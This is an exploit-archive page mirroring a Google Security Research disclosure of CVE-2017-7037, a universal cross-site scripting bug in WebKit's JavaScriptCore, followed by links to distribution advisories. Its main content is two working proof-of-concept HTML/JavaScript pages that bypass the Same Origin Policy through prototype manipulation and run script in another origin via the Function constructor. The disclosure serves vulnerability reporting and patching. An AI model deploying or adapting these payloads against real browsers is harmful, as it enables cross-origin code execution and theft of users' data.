Lucene search
Google Security Research1337DAY-ID-28186HistoryJul 25, 2017 - 12:00 a.m.
WebKit JSC JSObject::putInlineSlow / JSValue::putToPrimitive XSS Vulnerability
2017-07-2500:00:00
Google Security Research
0day.today
19
0.061 Low
EPSS
Percentile
92.7%
WebKit JSC JSObject::putInlineSlow and JSValue::putToPrimitive suffer from a universal cross site scripting vulnerability.
WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive
CVE-2017-7037
JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called.
The PoC shows to call a setter of another origin's object.
PoC 1 - JSValue::putToPrimitive:
<body>
<script>
let f = document.body.appendChild(document.createElement('iframe'));
let loc = f.contentWindow.location;
f.onload = () => {
let a = 1.2;
a.__proto__.__proto__ = f.contentWindow;
a['test'] = {toString: function () {
arguments.callee.caller.constructor('alert(location)')();
}};
};
f.src = 'data:text/html,' + `<iframe></iframe><script>
Object.prototype.__defineSetter__('test', v => {
'a' + v;
});
</scrip` + `t>`;
</script>
</body>
PoC 2 - JSObject::putInlineSlow:
<body>
<script>
let f = document.body.appendChild(document.createElement('iframe'));
let loc = f.contentWindow.location;
f.onload = () => {
let a = {
__proto__: f.contentWindow
};
a['test'] = {toString: function () {
arguments.callee.caller.constructor('alert(location)')();
}};
};
f.src = 'data:text/html,' + `<iframe></iframe><script>
Object.prototype.__defineSetter__('test', v => {
'a' + v;
});
</scrip` + `t>`;
</script>
</body>
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
# 0day.today [2018-03-19] #Related
debiancve
debiancve
CVE-2017-7037
2017-07-20 16:29:00
cve
cve
CVE-2017-7037
2017-07-20 16:29:00
prion
prion
Memory corruption
2017-07-20 16:29:00
packetstorm
packetstorm
WebKit JSC JSObject::putInlineSlow / JSValue::putToPrimitive XSS
2017-07-25 00:00:00
seebug
seebug
ubuntucve
ubuntucve
CVE-2017-7037
2017-07-20 00:00:00
fedora
fedora
[SECURITY] Fedora 25 Update: webkitgtk4-2.16.6-1.fc25
2017-07-31 00:22:09
[SECURITY] Fedora 24 Update: webkitgtk4-2.16.6-1.fc24
2017-08-07 20:18:27
[SECURITY] Fedora 26 Update: webkitgtk4-2.16.6-1.fc26
2017-07-27 16:54:47
mageia
mageia
Updated webkit2 packages fix security vulnerability
2017-07-30 11:17:28
openvas
openvas
Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb
2017-08-04 00:00:00
Mageia: Security Advisory (MGASA-2017-0228)
2022-01-28 00:00:00
Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a
2017-08-08 00:00:00
nessus
nessus
Fedora 24 : webkitgtk4 (2017-9d572cc64a)
2017-08-11 00:00:00
Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)
2017-07-31 00:00:00
Fedora 26 : webkitgtk4 (2017-24bddb96b5)
2017-07-28 00:00:00
archlinux
archlinux
[ASA-201707-25] webkit2gtk: multiple issues
2017-07-26 00:00:00
ubuntu
ubuntu
WebKitGTK+ vulnerabilities
2017-08-02 00:00:00
gentoo
gentoo
WebKitGTK+: Multiple Vulnerabilities
2017-10-13 00:00:00
apple
apple
About the security content of iCloud for Windows 6.2.2 - Apple Support
2017-07-19 05:37:40
About the security content of iCloud for Windows 6.2.2
2017-07-19 00:00:00
About the security content of iTunes 12.6.2 for Windows - Apple Support
2017-07-19 05:43:08
kaspersky
kaspersky
KLA11075 Multiple vulnerabilities in Apple iTunes
2017-07-19 00:00:00
freebsd
freebsd
webkit2-gtk3 -- multiple vulnerabilities
2017-07-24 00:00:00
suse
suse
Security update for webkit2gtk3 (important)
2017-11-06 15:08:25
Security update for webkit2gtk3 (important)
2017-11-10 18:22:30
Security update for webkit2gtk3 (important)
2018-02-01 00:14:30